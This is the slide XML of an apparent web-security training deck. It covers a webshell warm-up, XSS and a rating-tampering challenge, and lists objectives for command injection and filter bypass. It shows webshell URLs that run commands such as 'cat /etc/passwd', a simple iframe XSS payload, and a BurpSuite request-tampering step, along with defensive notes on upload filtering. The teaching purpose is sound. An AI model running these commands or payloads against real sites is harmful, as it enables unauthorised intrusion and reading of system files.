            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1063" name="Google Shape;1063;p5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64" name="Google Shape;1064;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="2228850"/>
            <a:ext cx="9144000" cy="26775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a:t>How would you construct a URL to:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dump /etc/passwd?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>https://vulnerable.site/shell.php?command=cat%20/etc/passwd</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Determine if ncat is installed?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>https://vulnerable.site/shell.php?command=ncat%20--version</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List all files in the current directory?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>https://vulnerable.site/shell.php?command=ls</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="80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9" name="Shape 1449"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1450" name="Google Shape;1450;p11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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1451" name="Google Shape;1451;p11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XSS Tier 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1452" name="Google Shape;1452;p11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53" name="Google Shape;1453;p112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1183050"/>
            <a:ext cx="9144000" cy="23463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sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>In the search bar, type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&lt;iframe src="javascript:alert('xss')"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1454" name="Google Shape;1454;p112"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="904725" y="1681050"/>
            <a:ext cx="7720526" cy="31010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8" name="Shape 1458"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1459" name="Google Shape;1459;p11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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1460" name="Google Shape;1460;p11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Zero Stars</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1461" name="Google Shape;1461;p11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5" name="Shape 1465"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1466" name="Google Shape;1466;p11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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1467" name="Google Shape;1467;p11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Zero Stars</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1468" name="Google Shape;1468;p11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69" name="Google Shape;1469;p114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1183050"/>
            <a:ext cx="9144000" cy="23463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sz="1800">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Capture the request using BurpSuite, change your rating to 0, then click Forward.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1470" name="Google Shape;1470;p114"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1928925" y="1792175"/>
            <a:ext cx="4512899" cy="282055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4" name="Shape 1474"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1475" name="Google Shape;1475;p11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Today’s Objectives</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1476" name="Google Shape;1476;p11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the end of class, you will be able to:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1477" name="Google Shape;1477;p11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78" name="Google Shape;1478;p115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3622200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Test for command injection vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bypass basic command injection filters. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1479" name="Google Shape;1479;p115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="1326248"/>
            <a:ext cx="230700" cy="2268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15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="1704023"/>
            <a:ext cx="230700" cy="2268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8" name="Shape 1068"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069" name="Google Shape;1069;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Webshell Warm-Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1070" name="Google Shape;1070;p5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Bypassing Filters</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1071" name="Google Shape;1071;p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72" name="Google Shape;1072;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1294450"/>
            <a:ext cx="9144000" cy="34116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600"/>
              <a:t>Suppose the web application you're assessing has a photo upload feature.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>State one technique for preventing users from uploading webshells.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Is there any way to bypass your suggested fix? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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6" name="Shape 1076"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077" name="Google Shape;1077;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Webshell Warm-Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1078" name="Google Shape;1078;p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Bypassing Filters</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1079" name="Google Shape;1079;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80" name="Google Shape;1080;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1294450"/>
            <a:ext cx="9144000" cy="34116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600"/>
              <a:t>Suppose the web application you're assessing has a photo upload feature.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>State one technique for preventing users from uploading webshells.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
              </a:rPr>
              <a:t>You could use a whitelist of allowed file types (i.e., only allow PNG, JPG/JPEG, etc.). Alternatively, you could use a blacklist of disallowed file types (i.e., don't allow PHP, Python, etc.)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Is there any way to bypass your suggested fix? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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4" name="Shape 1084"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085" name="Google Shape;1085;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Webshell Warm-Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086" name="Google Shape;1086;p6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Bypassing Filters</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1087" name="Google Shape;1087;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88" name="Google Shape;1088;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1294450"/>
            <a:ext cx="9144000" cy="34116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600"/>
              <a:t>Suppose the web application you're assessing has a photo upload feature.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>State one technique for preventing users from uploading webshells.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
              </a:rPr>
              <a:t>You could use a whitelist of allowed file types (i.e., only allow PNG, JPG/JPEG, etc.). Alternatively, you could use a blacklist of disallowed file types (i.e., don't allow PHP, Python, etc.)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Is there any way to bypass your suggested fix? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
              </a:rPr>
              <a:t>Blacklists can be bypassed by simply changing the file extension. Whitelists may be more robust to this bypass, as the web application can be configured to handle files of each allowed type in a specifically, secure way.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
